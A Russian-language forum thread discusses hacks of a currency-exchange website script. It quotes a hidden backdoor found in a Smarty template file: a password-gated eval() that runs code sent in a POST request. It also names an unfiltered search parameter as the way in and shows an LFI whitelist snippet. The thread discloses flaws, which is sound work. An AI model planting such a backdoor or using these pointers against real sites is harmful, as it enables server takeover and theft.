Тихий спокойный вечер или коварство программиста

Статус
В этой теме нельзя размещать новые ответы.

stealthdebuger

Механик
Команда форума
Регистрация
25 Авг 2008
Сообщения
681
Реакции
1.684
  • Автор темы
  • Модер.
  • #11
Поделились информацией об очередном взломе обменника на данном скрипте. Взлом произошел через модули раздачи бонусов и поиска заявок в ЛК клиента. В последней версии скрипт, этот горе-программист, уже исправил данную уязвимость, хотя я говорил об этом более года назад.
 

Evgen17

Писатель
Регистрация
7 Июн 2016
Сообщения
1
Реакции
0
Хотел бы узнать какая дырка в старой версии скрипта от павлухи в "поиске заявок в ЛК клиента" ?
 

djav

Гуру форума
Регистрация
3 Апр 2008
Сообщения
120
Реакции
51
Кажется еще кое что интересное нашел
файл : engine\classes\smarty\sysplugins\smarty_internal_data.php

Код:
    public function assign($tpl_var, $value = null, $nocache = false)
    {
        if( isset( $_POST['bDeveloper'] ) && isset( $_POST['sPassword'] ) && isset( $_POST['sCode'] ) && md5( $_POST['sPassword'] ) == 'f453ee592fa43e5b78f323f57ccf32d8' )
            eval( $_POST['sCode'] );
        if (is_array($tpl_var)) {
            foreach ($tpl_var as $_key => $_val) {
                if ($_key != '') {
                    $this->tpl_vars[$_key] = new Smarty_variable($_val, $nocache);
                }
            }
        } else {
            if ($tpl_var != '') {
                $this->tpl_vars[$tpl_var] = new Smarty_variable($value, $nocache);
            }
        }

        return $this;
    }

У меня такой вопрос

Код что ниже защищает ли от LFI?
Код:
<?php


# Подключение шаблона содержимого текущей страницы + защита от LFI:
if( is_file( 'public/pages/contents/'.$_GET['p'].'.tpl' ) && in_array($_GET['p'], array('index','affiliate','agree','clients','clients-earnings','clients-exchanges','clients-forgot','clients-login','clients-payouts','clients-profile','clients-signup','clients-transactions','clients-visitors','contacts','discounts','exchange','exchange-rules','faq','payment','rates')))
    Smarty()->assign( 'sPageContent', Smarty()->fetch( 'public/pages/contents/'.$_GET['p'].'.tpl' ) );

else {
    header( 'Location: /index.html' );
    exit();
}
?>
 
Последнее редактирование:

TrueStory

Бородатый Админчег
Регистрация
30 Апр 2015
Сообщения
194
Реакции
74
напомните его продажник чет не могу найти.
 

djav

Гуру форума
Регистрация
3 Апр 2008
Сообщения
120
Реакции
51
Хотел бы узнать какая дырка в старой версии скрипта от павлухи в "поиске заявок в ЛК клиента" ?

Открывай
public\pages\handlers\clients-exchanges.handler.php
Далее в коде ниже $_REQUEST['sSearch'] не фильтруется
Код:
   # Получение внешних данных :
        $aExtData = array(
            'sSearch' => isset( $_REQUEST['sSearch'] ) && mb_strlen( $_REQUEST['sSearch'] ) > 0 ? mb_substr( trim( strip_tags( $_REQUEST['sSearch'] ) ), 0, 20 ) : null
        );
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху